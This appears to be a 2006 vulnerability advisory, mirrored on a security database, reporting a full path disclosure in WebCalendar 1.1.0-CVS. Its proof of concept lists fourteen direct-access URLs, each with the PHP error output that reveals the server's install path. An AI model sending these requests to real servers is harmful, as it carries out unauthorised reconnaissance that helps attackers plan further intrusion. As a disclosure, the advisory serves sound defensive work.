Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12034
HistoryMar 30, 2006 - 12:00 a.m.

Full path disclosure in Webcalendar 1.1.0-CVS

2006-03-3000:00:00
vulners.com
11

Full path disclosure in webcalendar

Author : Rusydi Hasan M
a.k.a : cR45H3R
Location : Indonesia, Cilacap
Date : March,28th 2006
Version : 1.1.0-CVS

— (software description)

WebCalendar is a PHP application used to maintain a
calendar for one or more persons and for a variety of purposes.

— (vulnerable)

an attacker can get the location of the root directory from
error message

— (PoC)

  1. in directory /includes/index.php

    http://[victim]/[webcal_dir]/includes

    Parse error: parse error, unexpected T_STRING in
    /var/www/html/webcalendar/includes/index.php on line 1

2 in directory /tests/add_duration_test.php and /tests/all_tests.php

http://[victim]/[webcal_dir]/tests/add_duration_test.php

Fatal error: Class testoffunctions: Cannot inherit from undefined class
unittestcase in
/var/www/html/webcalendar/tests/add_duration_test.php on line 4

http://[victim]/[webcal_dir]/tests/all_tests.php

Warning: main(…/…/simpletest/unit_tester.php): failed to open stream: No
such file or
directory in /var/www/html/webcalendar/tests/all_tests.php on line 6

Fatal error: main(): Failed opening required
'…/…/simpletest/unit_tester.php'
(include_path='.:/usr/lib/php/:/usr/share/pear/') in
/var/www/html/webcalendar/tests/all_tests.php on line 6

3 in groups.php

http://[victim]/[webcal_dir]/groups.php

Fatal error: Call to undefined function: translate() in
/var/www/html/webcalendar/groups.php
on line 5

4 in nonusers.php

http://[victim]/[webcal_dir]/nonusers.php

Fatal error: Call to undefined function: translate() in
/var/www/html/webcalendar/nonusers.php on line 3

5 in /includes/settings.php

http://[victim]/[webcal_dir]/includes/settings.php

Parse error: parse error, unexpected ':' in
/var/www/html/webcalendar/includes/settings.php
on line 3

6 in /includes/init.php

http://[victim]/[webcal_dir]/includes/init.php

Warning: main(includes/classes/WebCalendar.class): failed to open stream: No
such file or
directory in /var/www/html/webcalendar/includes/init.php on line 46

Fatal error: main(): Failed opening required
'includes/classes/WebCalendar.class'
(include_path='.:/usr/lib/php/:/usr/share/pear/') in
/var/www/html/webcalendar/includes/init.php on line 46

7 in /includes/settings.php.orig

http://[victim]/[webcal_dir]/includes/settings.php.orig

Parse error: parse error, unexpected ':' in
/var/www/html/webcalendar/includes/settings.php.orig on line 21

8 in /includes/js/admin.php

http://[victim]/[webcal_dir]/includes/js/admin.php

Fatal error: Call to undefined function: etranslate() in
/var/www/html/webcalendar/includes/js/admin.php on line 14

9 in /includes/js/edit_entry.php

http://[victim]/[webcal_dir]/includes/js/edit_entry.php

Fatal error: Call to undefined function: etranslate() in
/var/www/html/webcalendar/includes/js/edit_entry.php on line 15

10 in /includes/js/edit_layer.php

http://[victim]/[webcal_dir]/includes/js/edit_layer.php

Fatal error: Call to undefined function: etranslate() in
/var/www/html/webcalendar/includes/js/edit_layer.php on line 24

11 in /includes/js/export_import.php

http://[victim]/[webcal_dir]/includes/js/export_import.php

Fatal error: Call to undefined function: etranslate() in
/var/www/html/webcalendar/includes/js/export_import.php on line 68

12 in /includes/js/popups.php

http://[victim]/[webcal_dir]/includes/js/popups.php

// You can copy/modify and distribute this code under the conditions // of
the GNU GENERAL
PUBLIC LICENSE Version 2. // var ns4 // Are we using Netscape4? var ie4 //
Are we using
Internet Explorer Version 4? var ie5 // Are we using Internet Explorer
Version 5 and up? var
kon // Are we using KDE Konqueror? var x,y,winW,winH // Current help position
and main
window size var idiv=null // Pointer to infodiv container var px="px" //
position suffix
with "px" in some cases var popupW // width of popup var popupH // height of
popup var
xoffset = 8 // popup distance from cursor x coordinate var yoffset = 12 //
popup distance
from cursor y coordinate var followMe = 1 // allow popup to follow
cursor…turn off for
better performance var maxwidth = 300 // maximum width of popup window
function
nsfix(){setTimeout("window.onresize = rebrowse", 2000);} function
rebrowse(){window.location.reload();} function infoinit(){
ns4=(document.layers)?true:false,
ie4=(document.all)?true:false;
ie5=((ie4)&&((navigator.userAgent.indexOf('MSIE
5')>0)||(navigator.userAgent.indexOf('MSIE 6')>0)))?true:false;
kon=(navigator.userAgent.indexOf('konqueror')>0)?true:false;
x=0;y=0;winW=800;winH=600;
idiv=null; if (followMe) { document.onmousemove = mousemove;
if(ns4&&document.captureEvents)
document.captureEvents(Event.MOUSEMOVE); } // Workaround for just another
netscape bug: Fix
browser confusion on resize // obviously conqueror has a similar problem :-(
if(ns4||kon){
nsfix() } if(ns4) { px=""; } var entries =
document.getElementsBySelector("a.entry");
entries = entries.concat(document.getElementsBySelector("a.layerentry"));
entries =
entries.concat(document.getElementsBySelector("a.unapprovedentry")); for (var
i = 0; i <
entries.length; i++) { entries[i].onmouseover = function(event) { show(event,
"eventinfo-" +
this.id); window.status = "
Fatal error: Call to undefined function: etranslate() in
/var/www/html/webcalendar/includes/js/popups.php on line 57
^
^
|---------- the directory

13 in /includes/js/pref.php

http://[victim]/[webcal_dir]/includes/js/pref.php

0 ) colorErr = true; if ( ! validWorkHours ( form ) ) { err += "
Fatal error: Call to undefined function: etranslate() in
/var/www/html/webcalendar/includes/js/pref.php on line 29

14 in /includes/menu/index.php

http://[victim]/[webcal_dir]/includes/menu

Fatal error: Call to undefined function: access_is_enabled() in
/var/www/html/webcalendar/includes/menu/index.php on line 24

— (shoutz)

#k-elektronik
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
#e-c-h-o (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
Ph03n1x,ghoz,r34d3r,spyoff,slackX,sakitjiwa,xnuxer
[email protected]
[email protected]
[email protected]

— (special)

danurdara prama for the bandwidth B)
— (contact)

cR45H3R || http://www.kecoak.or.id || [email protected]